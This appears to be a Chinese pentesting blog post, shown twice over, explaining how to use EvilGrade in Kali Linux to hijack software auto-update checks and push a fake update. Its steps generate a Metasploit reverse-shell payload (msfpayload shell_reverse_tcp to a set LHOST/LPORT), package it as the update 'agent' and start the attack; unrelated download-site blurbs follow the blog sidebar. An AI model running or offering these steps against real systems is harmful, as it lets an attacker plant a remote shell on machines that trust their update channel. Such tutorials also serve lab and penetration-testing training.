- 浏览: 285143 次
文章分类
- 全部博客 (276)
- burp+hydra暴力破解 (1)
- kali linux工具集 (6)
- kali (59)
- linux (54)
- password (14)
- web (63)
- 渗透测试 (50)
- windows (40)
- metasploit (9)
- 信息收集 (32)
- burp suit (4)
- 安全审计 (9)
- https://github.com/secretsquirrel/the-backdoor-factory (0)
- nmap (4)
- arachni (2)
- 工具 (5)
- sql (3)
- 网络 (2)
- 后渗透测试 (10)
- 内网 (5)
- 无线 (2)
- C (3)
- bios (1)
- RoR (12)
- mongodb (1)
- linxu (1)
- gdb (1)
- linux,虚拟化 (1)
- python (4)
最新评论
通常软甲更新过程:
软件开始更新过程,然后尝试从dns服务器获取IP信息(例如update.notepadplus.com)。dns返回响应信息。软件从update.app1.com获取lastupdate.xml文件分析是否有更新。如果有,则安装之。
kali中配置的EvilGrade软件可以用于注入假软件更新。
1.root@kali:~# evilgrade
[DEBUG] - Loading module: modules/allmynotes.pm
[DEBUG] - Loading module: modules/amsn.pm
[DEBUG] - Loading module: modules/appleupdate.pm
...
_ _ _
(_) | | |
_____ ___| | __ _ _ __ __ _ __| | ___
/ _ \ \ / / | |/ _` | '__/ _` |/ _` |/ _ \
| __/\ V /| | | (_| | | | (_| | (_| | __/
\___| \_/ |_|_|\__, |_| \__,_|\__,_|\___|
__/ |
|___/
-------------------------------------------
--------------------- www.infobytesec.com
- 63 modules available.
2.运行help命令可以看到该软件很简单,另外evilgrade支持tab键补全功能。
3.配置使用cpan模块:
注意VirtualHost是一个很重要的参数,它将会用于后门的攻击。
4.接下来设置agent参数,agent只不过是我们伪造的二进制文件。我们将设置它的存储位置,我们也可以设置一个动态的假的二进制更新文件。
方法一:在EvilGrade内创建:
<%OUT%><%OUT>标签用于指明输出二进制文件的位置。
方法二:在EvilGrade 使用msfpayload来生成
root@kali:~# msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.59.128 LPORT=5555 X > linux2
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell_reverse_tcp
Length: 68
Options: {"LHOST"=>"192.168.59.128", "LPORT"=>"5555"}
制作agent文件:
tar cf linux2.tar linux2
gzip linux2.tar
设置agent参数并开始运行:
evilgrade(cpan)>set agent /root/agent_perl.tar.gz
set agent, /root/agent_perl.tar.gz
evilgrade(cpan)>start
更多详细资料,参考http://resources.infosecinstitute.com/hacking-autoupdate-evilgrade/
软件开始更新过程,然后尝试从dns服务器获取IP信息(例如update.notepadplus.com)。dns返回响应信息。软件从update.app1.com获取lastupdate.xml文件分析是否有更新。如果有,则安装之。
kali中配置的EvilGrade软件可以用于注入假软件更新。
1.root@kali:~# evilgrade
[DEBUG] - Loading module: modules/allmynotes.pm
[DEBUG] - Loading module: modules/amsn.pm
[DEBUG] - Loading module: modules/appleupdate.pm
...
_ _ _
(_) | | |
_____ ___| | __ _ _ __ __ _ __| | ___
/ _ \ \ / / | |/ _` | '__/ _` |/ _` |/ _ \
| __/\ V /| | | (_| | | | (_| | (_| | __/
\___| \_/ |_|_|\__, |_| \__,_|\__,_|\___|
__/ |
|___/
-------------------------------------------
--------------------- www.infobytesec.com
- 63 modules available.
2.运行help命令可以看到该软件很简单,另外evilgrade支持tab键补全功能。
3.配置使用cpan模块:
注意VirtualHost是一个很重要的参数,它将会用于后门的攻击。
4.接下来设置agent参数,agent只不过是我们伪造的二进制文件。我们将设置它的存储位置,我们也可以设置一个动态的假的二进制更新文件。
方法一:在EvilGrade内创建:
evilgrade (notepadplus)>set agent ‘["/pentest/exploits/framework3/msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.59.128 LPORT=5555 X > <%OUT%>/tmp/notepadplus.exe<%OUT%>"]‘
<%OUT%><%OUT>标签用于指明输出二进制文件的位置。
方法二:在EvilGrade 使用msfpayload来生成
root@kali:~# msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.59.128 LPORT=5555 X > linux2
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell_reverse_tcp
Length: 68
Options: {"LHOST"=>"192.168.59.128", "LPORT"=>"5555"}
制作agent文件:
tar cf linux2.tar linux2
gzip linux2.tar
设置agent参数并开始运行:
evilgrade(cpan)>set agent /root/agent_perl.tar.gz
set agent, /root/agent_perl.tar.gz
evilgrade(cpan)>start
更多详细资料,参考http://resources.infosecinstitute.com/hacking-autoupdate-evilgrade/
发表评论
-
kali 2.0 broadcom wifi connection
2015-12-12 16:28 436引用apt-get install -y linux-head ... -
kali2.0中国源
2015-09-27 01:42 442#中科大kali源 deb http://mirrors.us ... -
wpscan
2015-08-01 10:39 427https://www.digitalocean.com/co ... -
linux dd命令
2015-06-06 14:29 370dd if=/dev/hda of=disk.mbr coun ... -
Wine中使用MinGW
2015-03-17 00:49 643原文:http://null-byte.wonderhowto ... -
linux install firefix&plugin
2015-01-22 20:56 4331. download firefox&plugins ... -
gitrob--github信息收集
2015-01-17 00:36 973原文地址:http://michenriksen.com/bl ... -
合并gif和php文件
2015-01-04 23:07 8261. apt-get install gifsicle ... -
kaili 1.09安装问题解决
2014-12-28 14:10 435本人采用的安装方法是 1. 在VMware中安装1.09 Ka ... -
[译]剪切粘贴二进制文件
2014-12-17 01:20 838原文地址:http://pen-testing.sans.or ... -
kali更新exploit-db
2014-12-12 01:08 1820cd /usr/share/exploitdb wget h ... -
使用Tesseract 识别验证码
2014-12-10 00:48 786参考: http://code.google.com/p/te ... -
使用apt-fast加速Ubuntu软件安装
2014-12-02 01:21 548apt-get是Ubuntu常用的软件安装和更新命令但是它使用 ... -
[译]通过认证的SMB Sessions攫取信息
2014-11-20 02:06 1213原文地址:http://pen-testing.sans.or ... -
[译]命令行连接wifi
2014-11-20 01:34 8277原文地址:http://www.blackmoreops.co ... -
[译]网络渗透测试及其,工具及资源
2014-11-19 02:06 706原文地址:http://pen-testi ... -
kali更新源
2014-11-12 19:37 6921. cat > /etc/apt/sources. ... -
chm文件转换成pdf 文件
2014-11-06 01:02 1398apt-get install chm2pdf chm2pdf ... -
DotDotPwn的https模式
2014-11-05 22:26 883参考: http://www.spentera.com/201 ... -
[译]dotdotpwn使用
2014-11-05 21:26 1644原文地址:https://github.c ...
相关推荐
Evilgrade是一个模块化框架,允许用户通过注入假更新来利用不良的升级实现。 它带有预制的二进制文件(代理),这是快速渗透测试的默认工作配置,并且具有自己的WebServer和DNSServer模块。 易于设置新设置,并且在...
2. Path for evilgrade (line 16) Ex: hamster='/pentest/hamster/' Each module in Wi-fEye uses a specific program to perform the selected attack. Here is a list of the programes needed for each modeule:...
Build and launch spoofing exploits with Ettercap and Evilgrade Induce error conditions and crash software using fuzzers Hack Cisco routers, switches, and network hardware Use advanced reverse ...
基于java学生宿舍管理系统设计与实现.docx
2023-04-06-项目笔记-第二百六十一阶段-课前小分享_小分享1.坚持提交gitee 小分享2.作业中提交代码 小分享3.写代码注意代码风格 4.3.1变量的使用 4.4变量的作用域与生命周期 4.4.1局部变量的作用域 4.4.2全局变量的作用域 4.4.2.1全局变量的作用域_1 4.4.2.259局变量的作用域_259- 2024-09-19
小程序-轻客洗衣.zip
基于java的海鲜自助餐厅系统设计与实现.docx
基于java的英语单词学习网站设计与实现.docx
基于java旅游信息网站设计与实现.docx
1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md或论文文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。、资源 5来自互联网采集,如有侵权,私聊博主删除。 6、可私信博主看论文后选择购买源代码。 1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md或论文文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。、资 5源来自互联网采集,如有侵权,私聊博主删除。 6、可私信博主看论文后选择购买源代码。 1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md或论文文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。 5、资源来自互联网采集,如有侵权,私聊博主删除。 6、可私信博主看论文后选择购买源代码。
内容概要:文中介绍了智能网联汽车(ICV)在全球范围内成为了汽车产业的热点,并且伴随车辆连通程度的上升而提升了基于数据分析的产品研发和服务扩展的比重,使得数据资产的重要性显著提高。在国家重视数据市场的发展之下,智能网联汽车的数据价值潜力巨大。本文从数据流通可能的应用情景切入,分析适用于ICV的资料元素规范,并诊断国内ICV资料流转面临的挑战并给出了改进对策。 适合人群:智能网联汽车领域内的从业人员,尤其是专注技术研发以及相关政策标准研究人员。 使用场景及目标:适用于从事智能网联汽车研发生产和数据应用的设计与规划,以及为未来的数据流动建立合理的模式。具体来讲,涵盖改善供应链信息流、优化交通管控、强化道路信息服务以及增强无人驾驶系统算法训练的效果等方面的工作。 其他说明:未来工作的重点领域集中在数据流通策略、技术验证和发展关键技术创新方面,以确保整个智能网联汽车行业可持续健康发展。
本文对绿色算力的概念进行了阐述,认为绿色算力是算力基础设施与生态保护有机结合的综合能力,并将其划分为算力设施、设备、平台、应用‘四位一体’协调发展的方式。通过分析绿色算力的含义、研究现状及关键技术(涵盖算力设备绿色技术、节能减排技术等)对其未来做出预测并给出了建议。此外还探讨了如何通过技术创新提高效率及推动全行业的数字化绿色化进程。 适合人群:电信、互联网数据中心、云技术提供商相关人员,对数据中心能耗管控及可持续发展战略有兴趣的决策人员等。 使用场景及目标:①用于数据中心绿色技术的应用;②助力企业或组织机构打造高效且环境友好的算力基础设施和服务;③帮助政策决策者和标准制制机构理解和确立相关方针策略。 其他注意事项:绿色算力不仅有助于环境保护,而且有助于企业削减运营费用,提高市场竞争力。文中提及的各项新技术、新方法有望成为未来的热门话题及发展方向。
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
基于深度确定性策略梯度的UAV辅助移动边缘计算计算卸载优化python源码.zip基于深度确定性策略梯度的UAV辅助移动边缘计算计算卸载优化python源码.zip 个人大四的毕业设计、课程设计、作业、经导师指导并认可通过的高分设计项目,评审平均分达96.5分。主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者,也可作为课程设计、期末大作业。 [资源说明] 不懂运行,下载完可以私聊问,可远程教学 该资源内项目源码是个人的毕设或者课设、作业,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96.5分,放心下载使用! 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请放心下载使用! 2、本项目适合计算机相关专业(如计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载学习,也适合小白学习进阶,当然也可作为毕设项目、课程设计、作业、项目初期立项演示等。 3、如果基础还行,也可在此代码基础上进行修改,以实现其他功能,也可用于毕设、课设、作业等。 下载后请首先打开README.md文件(如有),供学习参考。
项目工程资源经过严格测试可直接运行成功且功能正常的情况才上传,可轻松复刻,拿到资料包后可轻松复现出一样的项目,本人系统开发经验充足(全领域),有任何使用问题欢迎随时与我联系,我会及时为您解惑,提供帮助。 【资源内容】:包含完整源码+工程文件+说明(如有)等。答辩评审平均分达到96分,放心下载使用!可轻松复现,设计报告也可借鉴此项目,该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的。 【提供帮助】:有任何使用问题欢迎随时与我联系,我会及时解答解惑,提供帮助 【附带帮助】:若还需要相关开发工具、学习资料等,我会提供帮助,提供资料,鼓励学习进步 【项目价值】:可用在相关项目设计中,皆可应用在项目、毕业设计、课程设计、期末/期中/大作业、工程实训、大创等学科竞赛比赛、初期项目立项、学习/练手等方面,可借鉴此优质项目实现复刻,设计报告也可借鉴此项目,也可基于此项目来扩展开发出更多功能 下载后请首先打开README文件(如有),项目工程可直接复现复刻,如果基础还行,也可在此程序基础上进行修改,以实现其它功能。供开源学习/技术交流/学习参考,勿用于商业用途。质量优质,放心下载使用
均包含代码,文章,部分项目包含ppt
1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看REaDME.md或论文文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。 5、资源来自互联网采集,如有侵权,私聊博主删除。 6、可私信博主看论文后选择购买源代码。 1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md或论文文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。 5、资源来自互联网采集,如有侵权,私聊博主删除。 6、可私信博主看论文后选择购买源代码。 1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md或论文文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。 5、资源来自互联网采集,如有侵权,私聊博主删除。 6、可私信博主看论文后选择购买源代码。
均包含代码,文章,部分项目包含ppt
1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md或论文文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。 5、资源来自互联网采集,如有侵权,私聊博主删除。 6、可私信博主看论文后选择购买源代码。 1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md或论文文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。 5、资源来自互联网采集,如有侵权,私聊博主删除。 6、可私信博主看论文后选择购买源代码。 1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md或论文文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。 5、资源来自互联网采集,如有侵权,私聊博主删除。 6、可私信博主看论文后选择购买源代码。
关键字:UTM/企业防火墙/NGFW 功能:vpn,sdwan,无线控制器,ldap,双因子认证,nat/透明,终端控制,av防病毒,ips入侵检测,应用控制,web过滤, FortiGate UTM/NGFW产品 ①端口:8口、16口、24口、48口 ②层数:二层(接入层交换机、傻瓜式交换机)、三层(核心交换机、汇聚交换机) ③是否网管 网管: 非网管(傻瓜式交换机,即插即用) WEB网管(S1720GW系列) 全网管(S1720GFR系列,S2700以上的型号都为全网管) ④速率:百兆、千兆、万兆等 1.带机量(支持用户数) 2.端口数 3.吞吐量,并发连接数 4.功能 功能差异须知 NG-xxxx产品特有功能 TG-xxxx&NG-xxxx共有功能 TG-xxxx产品特有功能 FW:网络接入、安全防护、高可用性、身份认证、系统服务、系统管理 ●应用层DDOS攻击防护 负载均衡:多链路负载均衡与备份、多链路智能选路技术、多算法的服务器负载均衡 ●异常行为分析:内置统计只能算法,智能学习